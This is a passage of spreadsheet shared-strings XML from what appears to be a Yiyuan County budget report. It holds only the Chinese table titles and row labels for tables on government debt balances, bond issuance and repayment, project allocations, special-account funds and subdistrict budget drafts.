    <t>1.根据《财政部关于进一步加强地方政府主权外贷预算管理的通知》，中央转贷地方的国际金融组织和外国政府贷款数按照实际提款使用金额编列。</t>
  </si>
  <si>
    <t>2.政府外贷跨年度汇总损益等导致的变动已纳入2025年末地方政府一般债务余额执行数。</t>
  </si>
  <si>
    <t>表55</t>
  </si>
  <si>
    <t>2025年沂源县地方政府一般债务限额余额情况表</t>
  </si>
  <si>
    <t>2024年政府一般债务余额</t>
  </si>
  <si>
    <t>2025年新增一般债务限额</t>
  </si>
  <si>
    <t>2025年政府一般债务限额</t>
  </si>
  <si>
    <t>2025年政府一般债务余额</t>
  </si>
  <si>
    <t>表56</t>
  </si>
  <si>
    <t>2025年沂源县地方政府专项债务余额情况表</t>
  </si>
  <si>
    <t>一、2024年末地方政府专项债务余额实际数</t>
  </si>
  <si>
    <t>二、2025年末地方政府专项债务余额限额</t>
  </si>
  <si>
    <t>三、2024年地方政府专项债务发行额</t>
  </si>
  <si>
    <t>四、2025年地方政府专项债务还本额</t>
  </si>
  <si>
    <t>五、2025年末地方政府专项债务余额执行数</t>
  </si>
  <si>
    <t>表57</t>
  </si>
  <si>
    <t>2025年沂源县地方政府专项债务限额余额情况表</t>
  </si>
  <si>
    <t>2024年政府
专项债务余额</t>
  </si>
  <si>
    <t>2025年新增
专项债务限额</t>
  </si>
  <si>
    <t>2025年政府
专项债务限额</t>
  </si>
  <si>
    <t>2025年政府
专项债务余额</t>
  </si>
  <si>
    <t>表58</t>
  </si>
  <si>
    <t>2025年沂源县地方政府债券发行情况表</t>
  </si>
  <si>
    <t>一般债券额度</t>
  </si>
  <si>
    <t>专项债券额度</t>
  </si>
  <si>
    <t>小计</t>
  </si>
  <si>
    <t>新增一般
债券</t>
  </si>
  <si>
    <t>再融资债券</t>
  </si>
  <si>
    <t>新增专项
债券</t>
  </si>
  <si>
    <t>再融资
专项债券</t>
  </si>
  <si>
    <t>表59</t>
  </si>
  <si>
    <t>沂源县地方政府债券分年偿还计划情况表</t>
  </si>
  <si>
    <t>债券类型</t>
  </si>
  <si>
    <t>地区</t>
  </si>
  <si>
    <t>余额</t>
  </si>
  <si>
    <t>2026年</t>
  </si>
  <si>
    <t>2027年</t>
  </si>
  <si>
    <t>2028年</t>
  </si>
  <si>
    <t>2029年</t>
  </si>
  <si>
    <t>2030年及以后年度</t>
  </si>
  <si>
    <t>偿还资金来源</t>
  </si>
  <si>
    <t>一般债券</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>合计</t>
    </r>
  </si>
  <si>
    <t>一般公共预算</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>新增债券</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>置换债券</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>再融资债券</t>
    </r>
  </si>
  <si>
    <t>专项债券</t>
  </si>
  <si>
    <t>政府性基金预算</t>
  </si>
  <si>
    <t>表60</t>
  </si>
  <si>
    <t>2025年沂源县新增债券和政府外贷额度安排情况表</t>
  </si>
  <si>
    <t>地方政府新增债券</t>
  </si>
  <si>
    <t>政府外贷</t>
  </si>
  <si>
    <t>山东鲁科物流有限公司鲁中数智物流与供应链及基础设施项目</t>
  </si>
  <si>
    <t>沂源县沂河拦蓄引水工程</t>
  </si>
  <si>
    <t>第三污水处理厂项目</t>
  </si>
  <si>
    <t>沂源县青岛啤酒小镇基础设施提升改造项目</t>
  </si>
  <si>
    <t>沂源县沂蒙革命老区农村饮水安全工程</t>
  </si>
  <si>
    <t>沂源县政府投资项目</t>
  </si>
  <si>
    <t>沂源县第二污水处理厂扩建及配套管网改造项目</t>
  </si>
  <si>
    <t>沂源县化工产业园配套基础设施提升工程建设项目</t>
  </si>
  <si>
    <t>沂源县地方粮食储备库有限公司沂源县粮食和物资储备库建设项目</t>
  </si>
  <si>
    <t>沂源县海棠湾住宅土地储备专项债券项目</t>
  </si>
  <si>
    <t>沂源县域智慧停车项目</t>
  </si>
  <si>
    <t>付家庄棚户区改造安置楼房二期工程项目</t>
  </si>
  <si>
    <t>沂源县沂河支流东南河老城区段干支流地下排水涵渠行洪能力综合提升工程</t>
  </si>
  <si>
    <t>沂源县农村生活污水治理项目</t>
  </si>
  <si>
    <t>沂源县政府投资项目1</t>
  </si>
  <si>
    <t>沂源县政府投资项目2</t>
  </si>
  <si>
    <t>沂源县小计</t>
  </si>
  <si>
    <t>表61</t>
  </si>
  <si>
    <t>2025年沂源县新增债券和政府外贷项目用途情况表</t>
  </si>
  <si>
    <t>占比%</t>
  </si>
  <si>
    <t>一、交通基础设施</t>
  </si>
  <si>
    <t>（一）铁路</t>
  </si>
  <si>
    <t>（二）收费公路</t>
  </si>
  <si>
    <t>（三）机场（不含通用机场）</t>
  </si>
  <si>
    <t>（四）水运</t>
  </si>
  <si>
    <t>（五）城市轨道交通</t>
  </si>
  <si>
    <t>（六）城市停车场</t>
  </si>
  <si>
    <t>二、能源</t>
  </si>
  <si>
    <t>（一）天然气管网和储气设施</t>
  </si>
  <si>
    <t>（二）城乡电网（农村电网改造升级和城市配电网）</t>
  </si>
  <si>
    <t>三、农林水利</t>
  </si>
  <si>
    <t>（一）农业</t>
  </si>
  <si>
    <t>（二）水利</t>
  </si>
  <si>
    <t>（三）林业</t>
  </si>
  <si>
    <t>四、生态环保</t>
  </si>
  <si>
    <t>五、社会事业</t>
  </si>
  <si>
    <t>（一）卫生健康</t>
  </si>
  <si>
    <t>（二）教育</t>
  </si>
  <si>
    <t>（三）养老</t>
  </si>
  <si>
    <t>（四）文化旅游</t>
  </si>
  <si>
    <t>（五）其他社会事业</t>
  </si>
  <si>
    <t>六、城乡冷链等物流基础设施</t>
  </si>
  <si>
    <t>七、市政和产业园区基础设施</t>
  </si>
  <si>
    <t>八、国家重大战略项目</t>
  </si>
  <si>
    <t>九、保障性安居工程</t>
  </si>
  <si>
    <t>（一）城镇老旧小区改造</t>
  </si>
  <si>
    <t>（二）保障性租赁住房</t>
  </si>
  <si>
    <t>（三）棚户区改造</t>
  </si>
  <si>
    <t>十、其他</t>
  </si>
  <si>
    <t>表62</t>
  </si>
  <si>
    <t>2025年沂源县政府债券发行情况表</t>
  </si>
  <si>
    <t>发行日期</t>
  </si>
  <si>
    <t>债券种类</t>
  </si>
  <si>
    <t>期限</t>
  </si>
  <si>
    <t>利率</t>
  </si>
  <si>
    <t>发行量</t>
  </si>
  <si>
    <t>备注</t>
  </si>
  <si>
    <t>新增债券</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>新增债券小计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>再融资债券小计</t>
    </r>
  </si>
  <si>
    <t>再融资专项债券</t>
  </si>
  <si>
    <t>再融资一般债券</t>
  </si>
  <si>
    <t>各期地方政府债券发行信息已在中债登网站公开，可通过网上查询。</t>
  </si>
  <si>
    <t>表63</t>
  </si>
  <si>
    <t>沂源县地方政府债券发行及还本付息情况表</t>
  </si>
  <si>
    <t>项  目</t>
  </si>
  <si>
    <t>全市（县）</t>
  </si>
  <si>
    <t>市（县）本级</t>
  </si>
  <si>
    <t>一、2025年发行执行数</t>
  </si>
  <si>
    <t>（一）一般债券</t>
  </si>
  <si>
    <t xml:space="preserve">  其中：再融资债券</t>
  </si>
  <si>
    <t>（二）专项债券</t>
  </si>
  <si>
    <t>二、2025年还本执行数</t>
  </si>
  <si>
    <t>三、2025年付息执行数</t>
  </si>
  <si>
    <t>四、2026年还本预算数</t>
  </si>
  <si>
    <t xml:space="preserve">        财政预算安排</t>
  </si>
  <si>
    <t>五、2026年付息预算数</t>
  </si>
  <si>
    <t>表64</t>
  </si>
  <si>
    <t>2026年沂源县政府债务收支计划表</t>
  </si>
  <si>
    <t>金    额</t>
  </si>
  <si>
    <t>一、年初全县政府债务余额</t>
  </si>
  <si>
    <t>二、当年政府债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">     1.发行新增政府债券收入</t>
  </si>
  <si>
    <t xml:space="preserve">        一般债券</t>
  </si>
  <si>
    <t xml:space="preserve">        专项债券</t>
  </si>
  <si>
    <t xml:space="preserve">     2.发行再融资政府债券收入</t>
  </si>
  <si>
    <t>三、当年政府债务支出</t>
  </si>
  <si>
    <t xml:space="preserve">     1.新增一般债券列入一般公共预算项目支出</t>
  </si>
  <si>
    <t xml:space="preserve">     2.新增专项债券列入政府性基金预算项目支出</t>
  </si>
  <si>
    <t xml:space="preserve">     3.当年政府债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">         其中：使用再融资债券还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">                   一般债券</t>
  </si>
  <si>
    <t xml:space="preserve">                   专项债券</t>
  </si>
  <si>
    <t xml:space="preserve">               一般公共预算安排债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">               政府性基金预算安排债务还本支出</t>
  </si>
  <si>
    <t>四、年末全县政府债务余额</t>
  </si>
  <si>
    <t>附：全县一般公共预算和政府性基金预算安排债务付息及发行费支出</t>
  </si>
  <si>
    <t xml:space="preserve">         其中：债券付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">                 一般债券</t>
  </si>
  <si>
    <t xml:space="preserve">                 专项债券</t>
  </si>
  <si>
    <t>注：年末全县政府债务余额=年初政府债务余额+当年政府债务收入-当年政府债务还本支出</t>
  </si>
  <si>
    <t>表65</t>
  </si>
  <si>
    <t>2025年沂源县本级政府债务收支计划表</t>
  </si>
  <si>
    <t>一、年初县本级政府债务余额</t>
  </si>
  <si>
    <t xml:space="preserve">   1.新增政府债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">   2.发行再融资债券收入</t>
  </si>
  <si>
    <t xml:space="preserve">   1.新增一般债券列入本级一般公共预算项目支出</t>
  </si>
  <si>
    <t xml:space="preserve">   2.新增专项债券列入本级政府性基金预算项目支出</t>
  </si>
  <si>
    <t xml:space="preserve">   3.县本级债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其中：使用再融资债券还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">                一般债券</t>
  </si>
  <si>
    <t xml:space="preserve">                专项债券</t>
  </si>
  <si>
    <t xml:space="preserve">            一般公共预算安排债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">            政府性基金预算安排债务还本支出</t>
  </si>
  <si>
    <t>四、年末县本级政府债务余额</t>
  </si>
  <si>
    <t>附：县本级一般公共预算和政府性基金预算安排债务付息及发行费支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其中：债券付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">               一般债券</t>
  </si>
  <si>
    <t xml:space="preserve">               专项债券</t>
  </si>
  <si>
    <t>注：年末县本级政府债务余额=年初本级政府债务余额+当年政府债务收入-本级债务还本支出</t>
  </si>
  <si>
    <t>第六部分 
其他报表</t>
  </si>
  <si>
    <t>表66</t>
  </si>
  <si>
    <t>2025年沂源县财政专户管理资金收支执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="major"/>
      </rPr>
      <t>单位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="major"/>
      </rPr>
      <t>:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="major"/>
      </rPr>
      <t>万元</t>
    </r>
  </si>
  <si>
    <t>收入科目</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>2024</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>执行数</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>2025</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>执行数</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>比上年</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>增长</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>%</t>
    </r>
  </si>
  <si>
    <t>支出科目</t>
  </si>
  <si>
    <t>一、行政事业性收费收入(教育收费)</t>
  </si>
  <si>
    <t>二、其他收入</t>
  </si>
  <si>
    <t>二、公共安全支出</t>
  </si>
  <si>
    <t>三、教育支出</t>
  </si>
  <si>
    <t>四、科学技术支出</t>
  </si>
  <si>
    <t>五、文化体育与传媒支出</t>
  </si>
  <si>
    <t>六、社会保障和就业支出</t>
  </si>
  <si>
    <t>七、医疗卫生与计划生育支出</t>
  </si>
  <si>
    <t>八、城乡社区支出</t>
  </si>
  <si>
    <t>九、农林水支出</t>
  </si>
  <si>
    <t>十、国土海洋气象等支出</t>
  </si>
  <si>
    <t>十一、粮油物资储备支出</t>
  </si>
  <si>
    <t>十二、其他各项支出</t>
  </si>
  <si>
    <t xml:space="preserve">  调出资金</t>
  </si>
  <si>
    <t xml:space="preserve">  上年结余</t>
  </si>
  <si>
    <t xml:space="preserve">  年终结余</t>
  </si>
  <si>
    <t>表67</t>
  </si>
  <si>
    <t>2026年沂源县财政专户管理资金收支计划预算表</t>
  </si>
  <si>
    <r>
      <t>2025</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>执行数</t>
    </r>
  </si>
  <si>
    <r>
      <t>2026</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>预算数</t>
    </r>
  </si>
  <si>
    <t>表68</t>
  </si>
  <si>
    <t>2026年街道办事处一般公共预算收入预算草案表</t>
  </si>
  <si>
    <t>项       目</t>
  </si>
  <si>
    <t>历山街道办</t>
  </si>
  <si>
    <t>南麻街道办</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一、税收收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>增值税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>企业所得税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>个人所得税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资源税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市维护建设税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>房产税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>印花税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城镇土地使用税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>土地增值税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>车船税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>契税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>烟叶税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>环境保护税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他税收</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二、非税收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行政事业性收费收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有资源</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资产</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>有偿使用收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>本年收入合计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>三、债务收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府债券收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>四、转移性收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一般性转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上年结余收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>收入总计</t>
    </r>
  </si>
  <si>
    <t>表69</t>
  </si>
  <si>
    <t>2026年街道办事处一般公共预算支出预算草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>项</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">       </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>目</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>2025</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年执行数</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>2026</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年预算数</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>比上年增长</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>%</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一、一般公共服务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二、外交支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
